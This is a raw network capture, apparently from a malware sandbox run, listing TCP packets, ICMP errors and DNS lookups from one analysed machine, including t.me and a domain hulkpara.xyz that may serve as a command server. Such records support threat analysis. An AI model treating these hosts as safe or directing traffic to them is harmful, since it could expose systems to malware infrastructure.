                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.075479984 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.081340075 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.081357956 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.081381083 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.081655979 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.090823889 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.405808926 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.411834955 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.411854029 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.411952019 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.412121058 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.420521021 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.735511065 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.742062092 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.742079020 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.742149115 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.742317915 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:28.748343945 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.063554049 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.071050882 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.071091890 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.071168900 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.071341991 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.078949928 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.393956900 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.400413990 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.400429010 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.400484085 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.400708914 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.406507969 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.722402096 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.727490902 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.727507114 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.727647066 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.727762938 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.758570910 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:29.758795023 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.066752911 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.073429108 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.080019951 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.080085993 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.080156088 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.080471039 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.086430073 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.401138067 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.408044100 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.408102036 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.408114910 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.408348083 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.414099932 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.749691010 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.761296034 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.761327028 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.761400938 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.761815071 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:30.768800974 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:31.083659887 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:31.090419054 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:36.721569061 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:36.721786976 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:36.727978945 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.042752981 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.049470901 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.049484015 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.049571991 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.049740076 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.056303024 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.376684904 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.383178949 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.383343935 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.383356094 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.383462906 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.389961004 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.704742908 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.721585989 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.721597910 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.721651077 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.722017050 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:37.728341103 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.043441057 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.052365065 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.052398920 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.052443981 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.052896023 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.059154987 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.374427080 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.382498980 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.382510900 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.382519960 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.382814884 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.391673088 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.707087994 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.721461058 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.721518040 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.721569061 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.721841097 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:38.727440119 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.042224884 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.050955057 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.050992012 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.051048040 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.051295042 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.058002949 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.372880936 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.379456997 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.379497051 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.379525900 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.380014896 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.389084101 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.703869104 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.710540056 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.710575104 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.710644960 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.710953951 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:39.716980934 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.032881975 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.039463043 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.039495945 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.039628029 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.039724112 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.045398951 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.363850117 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.372337103 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.372370958 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.372412920 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.372760057 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.379362106 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.694598913 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.701227903 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.701266050 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.701373100 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.701517105 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:40.712814093 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:41.027702093 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:41.034147978 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:41.034182072 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:41.034214973 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:41.034495115 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.816587925 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.851486921 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.884159088 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.898307085 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057018042 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057040930 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057491064 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.085820913 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.101469994 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121179104 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121206045 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121222019 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121463060 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.176359892 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199145079 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199475050 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199804068 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.213329077 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214095116 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.242106915 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.371728897 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.415677071 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.435463905 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.460963964 CET49287443192.168.2.7162.159.61.3

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 19, 2024 08:13:54.677350998 CET | 192.168.2.7 | 1.1.1.1 | c29e | (Port unreachable) | Destination Unreachable
Dec 19, 2024 08:13:57.035322905 CET | 192.168.2.7 | 1.1.1.1 | c296 | (Port unreachable) | Destination Unreachable

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:12:59.274734020 CET | 192.168.2.7 | 1.1.1.1 | 0xb969 | Standard query (0) | cvCCAtzStAgfHNw.cvCCAtzStAgfHNw | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:16.087943077 CET | 192.168.2.7 | 1.1.1.1 | 0xba37 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:18.190912008 CET | 192.168.2.7 | 1.1.1.1 | 0xa724 | Standard query (0) | hulkpara.xyz | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:33.970803022 CET | 192.168.2.7 | 1.1.1.1 | 0x24f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:33.970963955 CET | 192.168.2.7 | 1.1.1.1 | 0x9c64 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:48.854537964 CET | 192.168.2.7 | 1.1.1.1 | 0x39ed | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:48.854794025 CET | 192.168.2.7 | 1.1.1.1 | 0xf8f8 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:51.567929029 CET | 192.168.2.7 | 1.1.1.1 | 0x9934 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:51.568382978 CET | 192.168.2.7 | 1.1.1.1 | 0x5332 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:52.360037088 CET | 192.168.2.7 | 1.1.1.1 | 0x310b | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:52.360225916 CET | 192.168.2.7 | 1.1.1.1 | 0x6044 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.074254990 CET | 192.168.2.7 | 1.1.1.1 | 0x2fb3 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.074631929 CET | 192.168.2.7 | 1.1.1.1 | 0x1ea4 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.075220108 CET | 192.168.2.7 | 1.1.1.1 | 0xd5a4 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.075397968 CET | 192.168.2.7 | 1.1.1.1 | 0x98e0 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.097162962 CET | 192.168.2.7 | 1.1.1.1 | 0x4403 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.097378969 CET | 192.168.2.7 | 1.1.1.1 | 0x153 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:56.650484085 CET | 192.168.2.7 | 1.1.1.1 | 0xc36 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.650703907 CET | 192.168.2.7 | 1.1.1.1 | 0x708c | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:56.652445078 CET | 192.168.2.7 | 1.1.1.1 | 0xf08d | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.652661085 CET | 192.168.2.7 | 1.1.1.1 | 0x8c47 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:12:59.519468069 CET | 1.1.1.1 | 192.168.2.7 | 0xb969 | Name error (3) | cvCCAtzStAgfHNw.cvCCAtzStAgfHNw | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:16.229360104 CET | 1.1.1.1 | 192.168.2.7 | 0xba37 | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:18.592995882 CET | 1.1.1.1 | 192.168.2.7 | 0xa724 | No error (0) | hulkpara.xyz |  | 94.130.191.168 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:34.109833002 CET | 1.1.1.1 | 192.168.2.7 | 0x24f | No error (0) | www.google.com |  | 172.217.19.228 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:34.110208035 CET | 1.1.1.1 | 192.168.2.7 | 0x9c64 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:48.864556074 CET | 1.1.1.1 | 192.168.2.7 | 0xf552 | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:48.995167971 CET | 1.1.1.1 | 192.168.2.7 | 0x39ed | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:48.996591091 CET | 1.1.1.1 | 192.168.2.7 | 0xf8f8 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:49.402771950 CET | 1.1.1.1 | 192.168.2.7 | 0xd2ed | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:49.402771950 CET | 1.1.1.1 | 192.168.2.7 | 0xd2ed | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:49.529758930 CET | 1.1.1.1 | 192.168.2.7 | 0xb1ac | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:51.708271027 CET | 1.1.1.1 | 192.168.2.7 | 0x5332 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:51.801568031 CET | 1.1.1.1 | 192.168.2.7 | 0x9934 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:52.499181032 CET | 1.1.1.1 | 192.168.2.7 | 0x310b | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:52.499181032 CET | 1.1.1.1 | 192.168.2.7 | 0x310b | No error (0) | googlehosted.l.googleusercontent.com |  | 172.217.17.65 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:52.500315905 CET | 1.1.1.1 | 192.168.2.7 | 0x6044 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:53.215002060 CET | 1.1.1.1 | 192.168.2.7 | 0x2fb3 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.215002060 CET | 1.1.1.1 | 192.168.2.7 | 0x2fb3 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.215663910 CET | 1.1.1.1 | 192.168.2.7 | 0x1ea4 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.216192007 CET | 1.1.1.1 | 192.168.2.7 | 0x98e0 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.216553926 CET | 1.1.1.1 | 192.168.2.7 | 0xd5a4 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.216553926 CET | 1.1.1.1 | 192.168.2.7 | 0xd5a4 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.236780882 CET | 1.1.1.1 | 192.168.2.7 | 0x153 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 19, 2024 08:13:53.238658905 CET | 1.1.1.1 | 192.168.2.7 | 0x4403 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:53.238658905 CET | 1.1.1.1 | 192.168.2.7 | 0x4403 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.422903061 CET | 1.1.1.1 | 192.168.2.7 | 0xa2b3 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:13:56.422903061 CET | 1.1.1.1 | 192.168.2.7 | 0xa2b3 | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.790715933 CET | 1.1.1.1 | 192.168.2.7 | 0xc36 | No error (0) | sb.scorecardresearch.com |  | 18.165.220.66 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.790715933 CET | 1.1.1.1 | 192.168.2.7 | 0xc36 | No error (0) | sb.scorecardresearch.com |  | 18.165.220.57 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.790715933 CET | 1.1.1.1 | 192.168.2.7 | 0xc36 | No error (0) | sb.scorecardresearch.com |  | 18.165.220.106 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.790715933 CET | 1.1.1.1 | 192.168.2.7 | 0xc36 | No error (0) | sb.scorecardresearch.com |  | 18.165.220.110 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:13:56.792058945 CET | 1.1.1.1 | 192.168.2.7 | 0xf08d | No error (0) | assets.msn.com | assets.msn.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.792193890 CET1.1.1.1192.168.2.70x8c47No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                                          • hulkpara.xyz
                                                                                                                                                                                                                                                                                          • www.google.com
